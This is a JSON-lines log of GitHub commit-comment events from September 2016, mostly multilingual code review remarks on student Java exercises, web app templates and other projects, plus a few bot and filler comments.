{"id":"4636985624","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielhenz/crescer-2016-2"},"payload":{"comment":{"id":19223126,"position":25,"line":41,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"aef19ee1fa19018aedf342a563c872a1e6fcc2a6","created_at":"2016-09-29T12:44:26Z","updated_at":"2016-09-29T12:44:26Z","body":"Cuidado com esta duplicação de código, isso é preocupante. Pq vc precisa de um método `fuiAtingido` que recebe a quantidade de flechas? É preciso apenas um método `fuiAtingido`!"}},"created_at":"2016-09-29T12:44:26Z"}
{"id":"4636986784","type":"CommitCommentEvent","actor":{"login":"akalinow"},"repo":{"name":"akalinow/RootAnalysis"},"payload":{"comment":{"id":19223128,"position":null,"line":null,"path":null,"commit_id":"ebde7ff196f8cfc708497bb1299488a37100297d","created_at":"2016-09-29T12:44:40Z","updated_at":"2016-09-29T12:44:40Z","body":"@mbluj @apyskir Dodałem skrypt do robienia histogramów do \"datacard\". Brakuje nam jeszcze rozbicia na pod próbki ZJ, ZL wg. definicji na TWiki."}},"created_at":"2016-09-29T12:44:40Z"}
{"id":"4636987227","type":"CommitCommentEvent","actor":{"login":"muditmohantyagi"},"repo":{"name":"muditmohantyagi/cp3"},"payload":{"comment":{"id":19223130,"position":null,"line":null,"path":null,"commit_id":"8c45170febd8b359e21974d25c8e15aa2eb82b24","created_at":"2016-09-29T12:44:45Z","updated_at":"2016-09-29T12:44:45Z","body":"vvvvvvvvvvv"}},"created_at":"2016-09-29T12:44:45Z"}
{"id":"4636990698","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mloebens/crescer-2016-2"},"payload":{"comment":{"id":19223138,"position":24,"line":27,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"f1038f7ff925477f9248520845b43e0931bfbfc9","created_at":"2016-09-29T12:45:23Z","updated_at":"2016-09-29T12:45:23Z","body":"@mloebens \r\n\r\nEsquece. Estava pensando depois no comentário e vi que não faz sentido, pois as condições acima são sempre exclusivas (um número menor que 0 nunca será maior que 100)."}},"created_at":"2016-09-29T12:45:23Z"}
{"id":"4636992017","type":"CommitCommentEvent","actor":{"login":"TiagoAFontana"},"repo":{"name":"eclufsc/ophidian"},"payload":{"comment":{"id":19223140,"position":7,"line":17,"path":"ophidian/parser/LibertyParser.h","commit_id":"9932973109f6e4959712525542813aa0823d6e41","created_at":"2016-09-29T12:45:38Z","updated_at":"2016-09-29T12:45:38Z","body":"OK"}},"created_at":"2016-09-29T12:45:38Z"}
{"id":"4636992460","type":"CommitCommentEvent","actor":{"login":"TiagoAFontana"},"repo":{"name":"eclufsc/ophidian"},"payload":{"comment":{"id":19223141,"position":17,"line":27,"path":"ophidian/parser/LibertyParser.h","commit_id":"9932973109f6e4959712525542813aa0823d6e41","created_at":"2016-09-29T12:45:43Z","updated_at":"2016-09-29T12:45:43Z","body":"OK"}},"created_at":"2016-09-29T12:45:43Z"}
{"id":"4636993211","type":"CommitCommentEvent","actor":{"login":"schoffelen"},"repo":{"name":"KristijanArmeni/fieldtrip"},"payload":{"comment":{"id":19223142,"position":null,"line":null,"path":null,"commit_id":"ebc90a91d50c0070f496da2ad0046c88ae417363","created_at":"2016-09-29T12:45:52Z","updated_at":"2016-09-29T12:45:52Z","body":"Yes indeed, it would make much sense. Please feel free to make a suggested fix for this. Note that the line numbers don't line up well anymore, I have just merged master into my mi branch (and pushed it to schoffelen/fieldtrip (mi-branch). I suggest that you ensure to have a fresh  version of the branch before you start making changes (to avoid conflicts). I guess that after the fix you could ask for a pull request into my fieldtrip repo (mi-branch). Sounds scary, but a good exercise."}},"created_at":"2016-09-29T12:45:52Z"}
{"id":"4636996314","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielhenz/crescer-2016-2"},"payload":{"comment":{"id":19223152,"position":null,"line":null,"path":null,"commit_id":"aef19ee1fa19018aedf342a563c872a1e6fcc2a6","created_at":"2016-09-29T12:46:27Z","updated_at":"2016-09-29T12:46:27Z","body":"Onde estão os testes para experiência do `Dwarf` ?"}},"created_at":"2016-09-29T12:46:27Z"}
{"id":"4636999472","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19223163,"position":41,"line":228,"path":"templates/partials/contacts_content.html","commit_id":"eccaae2055f094778b7e3be68776b6bb1ba1c16a","created_at":"2016-09-29T12:47:08Z","updated_at":"2016-09-29T12:47:08Z","body":"`filter:filterReportMonthsBack` is repeated here; would it make sense to filter it when the report list is loaded, so this does not need to be re-evaluated repeatedly?"}},"created_at":"2016-09-29T12:47:08Z"}
{"id":"4637000710","type":"CommitCommentEvent","actor":{"login":"idanen"},"repo":{"name":"noamkatzir/relight.js"},"payload":{"comment":{"id":19223168,"position":null,"line":null,"path":null,"commit_id":"6ea350efa7eef1e8cb8c95f7cadc287da68cc632","created_at":"2016-09-29T12:47:23Z","updated_at":"2016-09-29T12:47:23Z","body":"To encapsulate a little bit and get ready to support `export` modules, I believe it will be better to expose all methods on the same \"namespace\""}},"created_at":"2016-09-29T12:47:23Z"}
{"id":"4637001035","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19223169,"position":28,"line":224,"path":"templates/partials/contacts_content.html","commit_id":"eccaae2055f094778b7e3be68776b6bb1ba1c16a","created_at":"2016-09-29T12:47:27Z","updated_at":"2016-09-29T12:47:27Z","body":"`reports.noreports` better as `reports.none`?"}},"created_at":"2016-09-29T12:47:27Z"}
{"id":"4637002230","type":"CommitCommentEvent","actor":{"login":"SungHoHong2"},"repo":{"name":"SungHoHong2/SungHoHong2.github.io"},"payload":{"comment":{"id":19223171,"position":null,"line":null,"path":null,"commit_id":"365d447af16924bf28dd3bab3949a31b6f492689","created_at":"2016-09-29T12:47:42Z","updated_at":"2016-09-29T12:47:42Z","body":"add"}},"created_at":"2016-09-29T12:47:42Z"}
{"id":"4637005004","type":"CommitCommentEvent","actor":{"login":"dinoboff"},"repo":{"name":"singpath/classmentors"},"payload":{"comment":{"id":19223176,"position":null,"line":null,"path":null,"commit_id":"1649029ae3952f04c325f6b884198292be2d20d0","created_at":"2016-09-29T12:48:14Z","updated_at":"2016-09-29T12:48:14Z","body":"Maybe:\r\nhttps://firebase.google.com/docs/database/server/start#server-sdk-authentication\r\n```\r\nfirebase.initializeApp({\r\n  databaseURL: \"https://databaseName.firebaseio.com\",\r\n  serviceAccount: \"path/to/serviceAccountCredentials.json\",\r\n  databaseAuthVariableOverride: {\r\n    uid: \"my-service-worker\"\r\n  }\r\n});\r\n```\r\nMaybe it is just a short token to creating a token and authenticating with it.\r\n\r\n\r\nIt would be better keep log in the worker and have the security rules safeguarding the data.\r\n\r\nIf authentication is limited to 1 hour, you can could authenticate with a new token every 58 minutes. Use a timer or have the AWS lambda handler check when the token will expire and login in with a new token if it it 's valid for less than 1 minutes."}},"created_at":"2016-09-29T12:48:14Z"}
{"id":"4637011572","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19223192,"position":5,"line":688,"path":"translations/messages-en.properties","commit_id":"eccaae2055f094778b7e3be68776b6bb1ba1c16a","created_at":"2016-09-29T12:49:31Z","updated_at":"2016-09-29T12:49:31Z","body":"This notation is very weird!  Is it normal to have `MONTHS` in upper-case in the \"arg list\", and lower-case for the substitution position?  Looking at other examples, I guess it is o_O"}},"created_at":"2016-09-29T12:49:31Z"}
{"id":"4637012221","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19223194,"position":null,"line":null,"path":null,"commit_id":"583707d089b6ab12520ef1cef43a49471ad58db4","created_at":"2016-09-29T12:49:38Z","updated_at":"2016-09-29T12:49:38Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=1)"}},"created_at":"2016-09-29T12:49:38Z"}
{"id":"4637013084","type":"CommitCommentEvent","actor":{"login":"ronichoudhury"},"repo":{"name":"Kitware/candela"},"payload":{"comment":{"id":19223198,"position":null,"line":null,"path":null,"commit_id":"94b9a2c519c3e33dc79d4708b04bc5e9e98cc441","created_at":"2016-09-29T12:49:49Z","updated_at":"2016-09-29T12:49:49Z","body":"Thanks @jeffbaumes "}},"created_at":"2016-09-29T12:49:49Z"}
{"id":"4637013808","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19223200,"position":17,"line":213,"path":"templates/partials/contacts_content.html","commit_id":"eccaae2055f094778b7e3be68776b6bb1ba1c16a","created_at":"2016-09-29T12:49:58Z","updated_at":"2016-09-29T12:49:58Z","body":"I feel like `reportMonthsBack` could be named better, but I have no useful suggestions."}},"created_at":"2016-09-29T12:49:58Z"}
{"id":"4637020542","type":"CommitCommentEvent","actor":{"login":"maxycode"},"repo":{"name":"EflyStudio/zhanqun-dby"},"payload":{"comment":{"id":19223208,"position":43,"line":103,"path":"index.html","commit_id":"20ec24db7d7bf03e5aa2a74336f0a5774d98501b","created_at":"2016-09-29T12:51:11Z","updated_at":"2016-09-29T12:51:11Z","body":"echart和index 合并为一个js文件后删除多余的js文件引用 , jquery和highcharts-3d做成本地文件引入"}},"created_at":"2016-09-29T12:51:11Z"}
{"id":"4637023288","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19223211,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T12:51:42Z","updated_at":"2016-09-29T12:51:42Z","body":"ghgfdfghfg"}},"created_at":"2016-09-29T12:51:42Z"}
{"id":"4637025230","type":"CommitCommentEvent","actor":{"login":"jamesmhaley"},"repo":{"name":"wapisasa/batchelor"},"payload":{"comment":{"id":19223214,"position":null,"line":null,"path":null,"commit_id":"b142df5a5151a5afbe4a6a8a38e9b101fbf8e2b1","created_at":"2016-09-29T12:52:04Z","updated_at":"2016-09-29T12:52:04Z","body":"@bradvogel Happy if you want to bump the version and do a release of this bud! "}},"created_at":"2016-09-29T12:52:04Z"}
{"id":"4637025361","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19223216,"position":null,"line":null,"path":null,"commit_id":"567bbb3f84a6270e0f846d0880499b0169702cab","created_at":"2016-09-29T12:52:06Z","updated_at":"2016-09-29T12:52:06Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=3)"}},"created_at":"2016-09-29T12:52:06Z"}
{"id":"4637025456","type":"CommitCommentEvent","actor":{"login":"smalluban"},"repo":{"name":"smalluban/hybrids"},"payload":{"comment":{"id":19223217,"position":null,"line":null,"path":null,"commit_id":"f0ca077b185fb7b9c4239eab4d42655836fa7db5","created_at":"2016-09-29T12:52:07Z","updated_at":"2016-09-29T12:52:07Z","body":"Work in progress :) A co myślisz o nazwie projektu? "}},"created_at":"2016-09-29T12:52:07Z"}
{"id":"4637026343","type":"CommitCommentEvent","actor":{"login":"maxycode"},"repo":{"name":"EflyStudio/zhanqun-dby"},"payload":{"comment":{"id":19223220,"position":39,"line":81,"path":"js/echart.js","commit_id":"20ec24db7d7bf03e5aa2a74336f0a5774d98501b","created_at":"2016-09-29T12:52:17Z","updated_at":"2016-09-29T12:52:17Z","body":"代码格式调整 对齐。if 和括号之间要有一个空格，else 和中括号也要有一个空格"}},"created_at":"2016-09-29T12:52:17Z"}
{"id":"4637027632","type":"CommitCommentEvent","actor":{"login":"bradoyler"},"repo":{"name":"bradoyler/d3-node"},"payload":{"comment":{"id":19223222,"position":null,"line":null,"path":null,"commit_id":"725449cf2ea28599085c9948bd77a65be23e43ae","created_at":"2016-09-29T12:52:31Z","updated_at":"2016-09-29T12:52:31Z","body":"output\r\n![screen shot 2016-09-29 at 12 27 51 am](https://cloud.githubusercontent.com/assets/425966/18954672/08eafce8-8622-11e6-868b-bc0fac20ec45.png)\r\n"}},"created_at":"2016-09-29T12:52:31Z"}
{"id":"4637028208","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"regismartiny/crescer-2016-2"},"payload":{"comment":{"id":19223226,"position":10,"line":25,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"069c7f9d21d3d85f4c1b5f389ed0b395a23ec1ee","created_at":"2016-09-29T12:52:38Z","updated_at":"2016-09-29T12:52:38Z","body":"dá pra simplificar ainda mais esta lógica. Alguma ideia?"}},"created_at":"2016-09-29T12:52:38Z"}
{"id":"4637029028","type":"CommitCommentEvent","actor":{"login":"rotanid"},"repo":{"name":"MISP/MISP"},"payload":{"comment":{"id":19223227,"position":13,"line":2413,"path":"app/Controller/EventsController.php","commit_id":"6c5e72efad3e4b33b05cca93c122ca75b1645473","created_at":"2016-09-29T12:52:47Z","updated_at":"2016-09-29T12:52:47Z","body":"btw, (isset($var) && $var) is the same as (!empty($var))"}},"created_at":"2016-09-29T12:52:47Z"}
{"id":"4637029647","type":"CommitCommentEvent","actor":{"login":"maxycode"},"repo":{"name":"EflyStudio/zhanqun-dby"},"payload":{"comment":{"id":19223229,"position":44,"line":86,"path":"js/echart.js","commit_id":"20ec24db7d7bf03e5aa2a74336f0a5774d98501b","created_at":"2016-09-29T12:52:54Z","updated_at":"2016-09-29T12:52:54Z","body":"return false 一般是针对a标签来用的，在这里不必要，可以删除"}},"created_at":"2016-09-29T12:52:54Z"}
{"id":"4637029832","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"regismartiny/crescer-2016-2"},"payload":{"comment":{"id":19223230,"position":12,"line":63,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"069c7f9d21d3d85f4c1b5f389ed0b395a23ec1ee","created_at":"2016-09-29T12:52:56Z","updated_at":"2016-09-29T12:52:56Z","body":"Não precisa destes ()"}},"created_at":"2016-09-29T12:52:56Z"}
{"id":"4637032228","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19223235,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T12:53:22Z","updated_at":"2016-09-29T12:53:22Z","body":"hrhjfhfghfghfh"}},"created_at":"2016-09-29T12:53:22Z"}
{"id":"4637032968","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19223239,"position":null,"line":null,"path":null,"commit_id":"bd0bbe3a6c799f4a663ecd3a7f574a7cbeeba4ef","created_at":"2016-09-29T12:53:31Z","updated_at":"2016-09-29T12:53:31Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=4)"}},"created_at":"2016-09-29T12:53:31Z"}
{"id":"4637037622","type":"CommitCommentEvent","actor":{"login":"iamvery"},"repo":{"name":"phoenixframework/phoenix"},"payload":{"comment":{"id":19223250,"position":null,"line":null,"path":null,"commit_id":"a1efd8cc419ff09bd5304349a5fca5245e89094c","created_at":"2016-09-29T12:54:23Z","updated_at":"2016-09-29T12:54:23Z","body":"❤️"}},"created_at":"2016-09-29T12:54:23Z"}
{"id":"4637042727","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"smalluban/hybrids"},"payload":{"comment":{"id":19223259,"position":null,"line":null,"path":null,"commit_id":"f0ca077b185fb7b9c4239eab4d42655836fa7db5","created_at":"2016-09-29T12:55:22Z","updated_at":"2016-09-29T12:55:22Z","body":"Dziwna, ale może być ;) Taka oryginalna.\r\nWażne, aby delikatnie nawiązywała do tego co robi dany projekt,\r\na u Ciebie to się sprawdza, więc jest spox! 🤓"}},"created_at":"2016-09-29T12:55:22Z"}
{"id":"4637042916","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"akka/akka"},"payload":{"comment":{"id":19223260,"position":6,"line":4,"path":"akka-samples/akka-sample-cluster-scala/src/main/resources/application.conf","commit_id":"5558caa1f016003ec7b4d33ce5e8f82106dcd020","created_at":"2016-09-29T12:55:24Z","updated_at":"2016-09-29T12:55:24Z","body":"True, I reverted all changes to this example. It should be a separate PR replacing in all places."}},"created_at":"2016-09-29T12:55:24Z"}
{"id":"4637043387","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19223263,"position":null,"line":null,"path":null,"commit_id":"1db71d9417365853609970dc8cd6d5febeb94f84","created_at":"2016-09-29T12:55:29Z","updated_at":"2016-09-29T12:55:29Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=6)"}},"created_at":"2016-09-29T12:55:29Z"}
{"id":"4637045151","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19223264,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T12:55:49Z","updated_at":"2016-09-29T12:55:49Z","body":"hnhfnbvcnfhjhdfhfdg"}},"created_at":"2016-09-29T12:55:49Z"}
{"id":"4637045819","type":"CommitCommentEvent","actor":{"login":"IonicaBizau"},"repo":{"name":"IonicaBizau/medium-editor-markdown"},"payload":{"comment":{"id":19223266,"position":4,"line":3,"path":"package.json","commit_id":"e050380b53ffb68e3e64a0228889cbd37df35436","created_at":"2016-09-29T12:55:56Z","updated_at":"2016-09-29T12:55:56Z","body":"@sielay Thanks for heads up! :+1: [My tools](https://ionicabizau.net/blog/33-how-i-npm) take care of publishing and sometimes (rarely) it happens they don't publish the code on npm––didn't have time to debug that. I think sometimes it just generates (for some reason) versions lower than the current one.\r\n\r\nIt should be fine now. :grin: "}},"created_at":"2016-09-29T12:55:56Z"}
{"id":"4637049207","type":"CommitCommentEvent","actor":{"login":"acherrera"},"repo":{"name":"GeraldAlanis/cyclone"},"payload":{"comment":{"id":19223271,"position":null,"line":null,"path":null,"commit_id":"8172e3ba527393827c11606bae4c5a1ae7951b18","created_at":"2016-09-29T12:56:33Z","updated_at":"2016-09-29T12:56:33Z","body":"How do we change that \"Tutorial showing what Python can do pretty quickly\" at the, top that is super annoying"}},"created_at":"2016-09-29T12:56:33Z"}
{"id":"4637051406","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19223276,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T12:56:57Z","updated_at":"2016-09-29T12:56:57Z","body":"hjkhjkhjkhjkhjgkhjgk"}},"created_at":"2016-09-29T12:56:57Z"}
{"id":"4637053106","type":"CommitCommentEvent","actor":{"login":"Hoverbear"},"repo":{"name":"Manishearth/rust-internals-docs"},"payload":{"comment":{"id":19223283,"position":null,"line":null,"path":null,"commit_id":"0d879be1dbf2af42cdf8f7fdeb66ba2b226d6226","created_at":"2016-09-29T12:57:15Z","updated_at":"2016-09-29T12:57:15Z","body":"👍 LGTM."}},"created_at":"2016-09-29T12:57:15Z"}
{"id":"4637055432","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"regismartiny/crescer-2016-2"},"payload":{"comment":{"id":19223287,"position":19,"line":21,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"5076b2bacffe83843f3416ca15029a8f3166a598","created_at":"2016-09-29T12:57:42Z","updated_at":"2016-09-29T12:57:42Z","body":"Cliente não pediu isto."}},"created_at":"2016-09-29T12:57:42Z"}
{"id":"4637059290","type":"CommitCommentEvent","actor":{"login":"Phoenix616"},"repo":{"name":"Phoenix616/ChestShopNotifier"},"payload":{"comment":{"id":19223295,"position":null,"line":null,"path":null,"commit_id":"eb0a2b77a7d9350249acc49ae29573c20b618737","created_at":"2016-09-29T12:58:24Z","updated_at":"2016-09-29T12:58:24Z","body":"OK, looks like it originated in the different implementations of UUID compatibility that existed in sgdc3's and my fork and the main one. I've restored that for now in my fork and it compiled as intended. Maybe I shouldn't depend on my own fork but the main one... ^^'"}},"created_at":"2016-09-29T12:58:24Z"}
{"id":"4637061149","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"regismartiny/crescer-2016-2"},"payload":{"comment":{"id":19223302,"position":15,"line":48,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"8cb21da8d822395f9e5e8c0cd47dfc70c824772f","created_at":"2016-09-29T12:58:45Z","updated_at":"2016-09-29T12:58:45Z","body":"esse else if vazio é inútil, pois não faz nada. Concorda?"}},"created_at":"2016-09-29T12:58:45Z"}
{"id":"4637068796","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"akka/akka"},"payload":{"comment":{"id":19223316,"position":6,"line":4,"path":"akka-samples/akka-sample-cluster-scala/src/main/resources/application.conf","commit_id":"5558caa1f016003ec7b4d33ce5e8f82106dcd020","created_at":"2016-09-29T13:00:10Z","updated_at":"2016-09-29T13:00:10Z","body":"fixed in separate branch"}},"created_at":"2016-09-29T13:00:10Z"}
{"id":"4637074779","type":"CommitCommentEvent","actor":{"login":"samsongejibo"},"repo":{"name":"samsongejibo/CBS-Dashboard"},"payload":{"comment":{"id":19223325,"position":null,"line":null,"path":null,"commit_id":"33fc0b7ec3f616477f2541f15a6a80158838fd6e","created_at":"2016-09-29T13:01:14Z","updated_at":"2016-09-29T13:01:14Z","body":"changes approved"}},"created_at":"2016-09-29T13:01:14Z"}
{"id":"4637075080","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19223326,"position":null,"line":null,"path":null,"commit_id":"8f9a5e14120f422919e75ea1d25e127301533de2","created_at":"2016-09-29T13:01:18Z","updated_at":"2016-09-29T13:01:18Z","body":"@Keital Nice Job :octocat: "}},"created_at":"2016-09-29T13:01:18Z"}
{"id":"4637075332","type":"CommitCommentEvent","actor":{"login":"SteveEbey73742"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19223327,"position":null,"line":null,"path":null,"commit_id":"7131ffac72a2bf7eb19fd42a1fb3ad0627c587b6","created_at":"2016-09-29T13:01:21Z","updated_at":"2016-09-29T13:01:21Z","body":"Uploaded the changes from my local copy, that is why the changes are so large. I did not rewrite warehouse, just added the lines to show order rescources."}},"created_at":"2016-09-29T13:01:21Z"}
{"id":"4637075339","type":"CommitCommentEvent","actor":{"login":"Black-Black-Man"},"repo":{"name":"Black-Black-Man/hello_world"},"payload":{"comment":{"id":19223328,"position":null,"line":null,"path":null,"commit_id":"0f3e4add6d5045f08cf764b22f1041f8171baaf8","created_at":"2016-09-29T13:01:21Z","updated_at":"2016-09-29T13:01:21Z","body":"Add one line"}},"created_at":"2016-09-29T13:01:21Z"}
{"id":"4637075447","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19223329,"position":26,"line":26,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"5457dbd5bd48346bfe1cd0c7d39fea4158c7f8db","created_at":"2016-09-29T13:01:22Z","updated_at":"2016-09-29T13:01:22Z","body":"Dá pra simplificar a implementação:\r\n\r\n```Java\r\nreturn (this.getAno() % 4 == 0 &&  this.getAno() % 100 != 0) || this.getAno() % 400 == 0;\r\n```"}},"created_at":"2016-09-29T13:01:22Z"}
{"id":"4637076700","type":"CommitCommentEvent","actor":{"login":"lambdalisue"},"repo":{"name":"lambdalisue/vim-rplugin"},"payload":{"comment":{"id":19223334,"position":9,"line":11,"path":"python3/rplugin.py","commit_id":"1dfd38c5076c772121a92e074a5932455854c9cc","created_at":"2016-09-29T13:01:37Z","updated_at":"2016-09-29T13:01:37Z","body":"Thanks for the comment. Nice to know :-)\r\n\r\nhttps://docs.python.org/3.5/library/codecs.html#error-handlers\r\nhttps://www.python.org/dev/peps/pep-0383/"}},"created_at":"2016-09-29T13:01:37Z"}
{"id":"4637077121","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19223335,"position":null,"line":null,"path":null,"commit_id":"451e28896df866e65380edf4947628b1781d6824","created_at":"2016-09-29T13:01:42Z","updated_at":"2016-09-29T13:01:42Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=8)"}},"created_at":"2016-09-29T13:01:42Z"}
{"id":"4637077691","type":"CommitCommentEvent","actor":{"login":"blackdaemon"},"repo":{"name":"blackdaemon/ulogme"},"payload":{"comment":{"id":19223338,"position":null,"line":null,"path":null,"commit_id":"2ff838bcb5e3bbd2a19fd907a9ce915f37b18998","created_at":"2016-09-29T13:01:47Z","updated_at":"2016-09-29T13:01:47Z","body":"![ulogme_highcharts_pie](https://cloud.githubusercontent.com/assets/6154/18954976/9fe527a8-8655-11e6-8db3-238ab32a6acd.png)\r\n"}},"created_at":"2016-09-29T13:01:47Z"}
{"id":"4637078869","type":"CommitCommentEvent","actor":{"login":"samsongejibo"},"repo":{"name":"samsongejibo/CBS-Dashboard"},"payload":{"comment":{"id":19223344,"position":null,"line":null,"path":null,"commit_id":"83ed5cb6109f612356f610ccc2ea4e3072bf296d","created_at":"2016-09-29T13:01:59Z","updated_at":"2016-09-29T13:01:59Z","body":"changes approved"}},"created_at":"2016-09-29T13:01:59Z"}
{"id":"4637078888","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19223345,"position":null,"line":null,"path":null,"commit_id":"9127064e99424841ac23e5964e7c241ee7961d9f","created_at":"2016-09-29T13:02:00Z","updated_at":"2016-09-29T13:02:00Z","body":"Coloca pelo menos mais um caso de teste."}},"created_at":"2016-09-29T13:02:00Z"}
{"id":"4637080108","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19223348,"position":null,"line":null,"path":null,"commit_id":"423159babcb3f8351ee3fa299df80cf7397df9da","created_at":"2016-09-29T13:02:13Z","updated_at":"2016-09-29T13:02:13Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=9)"}},"created_at":"2016-09-29T13:02:13Z"}
{"id":"4637082370","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19223350,"position":2,"line":2,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"741e51d64bcad23a66fee2eb44890153e2166c7d","created_at":"2016-09-29T13:02:39Z","updated_at":"2016-09-29T13:02:39Z","body":"Sugiro apagar a outra classe `Anao` para que não fique confuso ambas classes existindo no projeto."}},"created_at":"2016-09-29T13:02:39Z"}
{"id":"4637083116","type":"CommitCommentEvent","actor":{"login":"php-coder"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19223353,"position":5,"line":5,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T13:02:47Z","updated_at":"2016-09-29T13:02:47Z","body":"Because it will use `hostPath` with pre-created PVs, maybe we should remove word \"scalable\"?"}},"created_at":"2016-09-29T13:02:47Z"}
{"id":"4637085826","type":"CommitCommentEvent","actor":{"login":"DeinFreund"},"repo":{"name":"springweblobby/swl-website"},"payload":{"comment":{"id":19223362,"position":null,"line":null,"path":null,"commit_id":"729cf2bd75b92f67c2c50f9babfbd8dba39488ce","created_at":"2016-09-29T13:03:18Z","updated_at":"2016-09-29T13:03:18Z","body":"I wonder why the button is broken..."}},"created_at":"2016-09-29T13:03:18Z"}
{"id":"4637086398","type":"CommitCommentEvent","actor":{"login":"victoreob"},"repo":{"name":"victoreob/crescer-2016-2"},"payload":{"comment":{"id":19223364,"position":null,"line":null,"path":null,"commit_id":"9dad342b4118122174c7169031f55fe4f1b21ad4","created_at":"2016-09-29T13:03:24Z","updated_at":"2016-09-29T13:03:24Z","body":"Adicionei dois novos casos.\r\nPode verificar se a usei a convenção corretamente?"}},"created_at":"2016-09-29T13:03:24Z"}
{"id":"4637087407","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19223366,"position":14,"line":14,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"741e51d64bcad23a66fee2eb44890153e2166c7d","created_at":"2016-09-29T13:03:35Z","updated_at":"2016-09-29T13:03:35Z","body":"Prestar atenção no texto do exercício:\r\n\r\n`Adicione um construtor à classe Dwarf que receba além de um nome (agora sim, Dwarves têm nome), um OBJETO do tipo DataTerceiraEra e o atribua ao campo dataNascimento.`"}},"created_at":"2016-09-29T13:03:35Z"}
{"id":"4637087640","type":"CommitCommentEvent","actor":{"login":"akalinow"},"repo":{"name":"akalinow/RootAnalysis"},"payload":{"comment":{"id":19223367,"position":null,"line":null,"path":null,"commit_id":"ebde7ff196f8cfc708497bb1299488a37100297d","created_at":"2016-09-29T13:03:38Z","updated_at":"2016-09-29T13:03:38Z","body":"@apyskir: Andrzej zamin zaczniesz wprowadzać poprawki zsynchronizuj się ze swoją gałęzią (Michał coś tam wrzucał) i z gałęzią master."}},"created_at":"2016-09-29T13:03:38Z"}
